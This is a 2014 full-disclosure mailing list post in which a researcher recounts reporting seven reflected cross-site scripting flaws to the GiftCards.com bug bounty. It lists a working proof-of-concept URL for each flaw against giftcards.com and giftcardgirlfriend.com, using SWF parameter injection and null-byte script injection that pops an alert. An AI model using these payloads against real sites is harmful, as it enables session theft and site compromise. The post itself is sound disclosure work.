Message-ID: <5302FA0E.7060501@t-online.de>
Date: Tue, 18 Feb 2014 07:13:34 +0100
From: Stefan Schurtz <sschurtz@...nline.de>
To: full-disclosure@...ts.grok.org.uk
Subject: My experiences with the GiftCards.com Bug Bounty Program

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Since November 2013 I have reported seven Cross-site Scripting
vulnerabilities to the Giftcard Bug Bounty Program. Sadly, only one of
them wasn't a duplicate :-/. Strange? Perhaps, but not impossible
given the simplicity of the vulnerabilities.

But what I really don't understand: Why do they still work today?

######################################
# 11/17/2013 Vulnerability #1: (DUP) #
######################################

// Reflected Cross-site Scripting

http://www.giftcardgirlfriend.com/wp-content/plugins/audio-player/assets/player.swf?playerID=a\"))}catch(e){alert(document.domain)}//

// Original advisory

http://insight-labs.org/?p=738

Screenshot:

http://darksecurity.de/advisories/BugBounty/giftcards/player.swf-Sourcecode-Giftcardgirlfriend.com.JPG

#########################################################
# 11/17/2013 Vulnerability #2: - OK - Reward or not ;-) #
#########################################################

// Reflected Cross-site Scripting (tested with FF 25.0.1)

http://www.giftcardgirlfriend.com/wp-includes/js/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//

// Original Advisory

http://inj3ct0rs.com/exploit/description/19711

Screenshots:

http://darksecurity.de/advisories/BugBounty/giftcards/Wordpress-Version-SourceCode-giftcardgirlfriend.com.JPG

http://darksecurity.de/advisories/BugBounty/giftcards/XSS-swfupload-giftcardgirlfriend.com.JPG

######################################
# 11/21/2013 Vulnerability #3: (DUP) #
######################################

// Reflected Cross-site Scripting with SWF-Files (tested on Firefox 25.0.1)

http://www.giftcards.com/swf/elf.swf?va_link=javascript:alert(document.domain);
http://www.giftcards.com/swf/santa-sample.swf?va_link=javascript:alert(document.domain);

Screenshots:

http://darksecurity.de/advisories/BugBounty/giftcards/XSS-SWFFiles-Giftcards.JPG

http://darksecurity.de/advisories/BugBounty/giftcards/SWFScan-Screenshot.JPG

######################################
# 11/26/2013 Vulnerability #4: (DUP) #
######################################

// Reflected Cross-site Scripting with IE10

https://www.giftcards.com/order-status?%00"><script>alert(document.domain)</script>

Screenshot:

http://darksecurity.de/advisories/BugBounty/giftcards/XSS-OrderStatus-Giftcards.com.JPG

################################
# 12/05/2013 Vulnerability #5: #
################################

// Reflected Cross-site Scripting with IE10

https://www.giftcards.com/signup?%00"><script>alert(document.domain)</script>

Screenshot:

http://darksecurity.de/advisories/BugBounty/giftcards/XSS-Signup-Giftcards.com.JPG

################################
# 12/05/2013 Vulnerability #6: #
################################

// Reflected Cross-site Scripting with IE10

https://www.giftcards.com/member?%00"><script>alert(document.domain)</script>

Screenshot:

http://darksecurity.de/advisories/BugBounty/giftcards/XSS-Member-Giftcards.com.JPG

################################
# 12/05/2013 Vulnerability #7: #
################################

// Reflected Cross-site Scripting with IE10

http://www.giftcards.com/group-gifts/create/new?%00"><script>alert(document.domain)</script>

Screenshot:

http://darksecurity.de/advisories/BugBounty/giftcards/XSS-GroupGifts-Giftcards.com.JPG


Cheers,
sschurtz
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlMC+gUACgkQg3svV2LcbMAVOQCePRZ4zb2nhf+6UowoxtTbkb1s
8wIAmQG/BGuP6kNdni4vaae4x0mhPn3P
=SZx4
-----END PGP SIGNATURE-----
